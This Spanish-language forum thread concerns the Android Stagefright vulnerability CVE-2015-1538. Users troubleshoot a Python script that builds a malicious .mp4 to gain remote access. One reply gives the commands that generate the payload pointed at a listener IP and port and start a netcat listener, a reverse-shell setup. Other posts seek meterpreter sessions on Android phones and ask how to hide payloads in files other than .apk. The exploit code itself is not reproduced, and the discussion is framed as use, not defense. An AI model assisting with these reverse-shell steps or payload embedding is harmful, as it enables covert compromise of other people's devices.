[cve-2015-1538-1] Exploit para android en python

Iniciado por $francisco, Marzo 31, 2016, 04:22:00 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 31, 2016, 04:22:00 PM Ultima modificación: Abril 04, 2016, 08:57:18 PM por Expermicid
Es realmente interesante esta vulneravilidad de android que está basada en un bug del sofware multimeda que afecta de la versión 2.2 a la 5.1

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Se envia el video en el formato ".mp4" y este contiene el codigo para explotar la vulneravilidad en android y aunque todavia no lo he utlizado me parecio muy interesante y si lo pruebo os comento que tal fué.

Marzo 31, 2016, 05:27:57 PM #1 Ultima modificación: Abril 04, 2016, 08:57:29 PM por Expermicid
Habia oido algo sobre ese bug ahorita lo veo se oye interesante :)


yo he llegado hasta aqui....vi el post y me parecio interesante..pero a la hora de ejecutar el script me daba errores...este video me ayudo a corregir ciertos errores que me daba al ejecutarlo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta una vez consegui ejecutar el script segui los pasos, me genero el mp4 y al probarlo ese fue el resultado...no abre ninguna sesion






yo he probado esto..consigo sesion pero se pierde a los pocos segundos..y a la hora de hacer un help en el meterpreter no aparecen opciones como sysinfo getuid shell etc...




el tio este lo hace desde el modulo ya cargado en metasploit pero yo no consigo cargar el modulo...lo intente haciendo esto

copie el script a la ruta donde estan los exploits y lo intente ejecutar desde la consola de metasploit pero me aparece como que no encuentra el script

video del tipo ejecutando el modulo en metasploit
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Yo probe con el 38164 y no funciona
Código: bash
mp4.py -c 192.168.0.168 -p 4444

Código: bash
netcat -l -p 4444


Yo tengo android 4.4.2 y no funciona supuestamente es para inferior a 5.0 y tambien probe con los demas exploit y nada

como que tiene muchos bugs ese exploit, o seran a proposito?

Quizas sea a proposito pero se cambia rapido, solo es sustituir unas pocas cosas pero creo que esos errores los parchean enseguida

Yo estoy intentando abrir una sesion meterpreter en un android, pero no se instala la aplicacion .apk. ¿Alguien sabe por que?

También estoy buscando como añadir el payload en otro archivo que no sea apk, como en el caso de este post, crea un archivo mp4.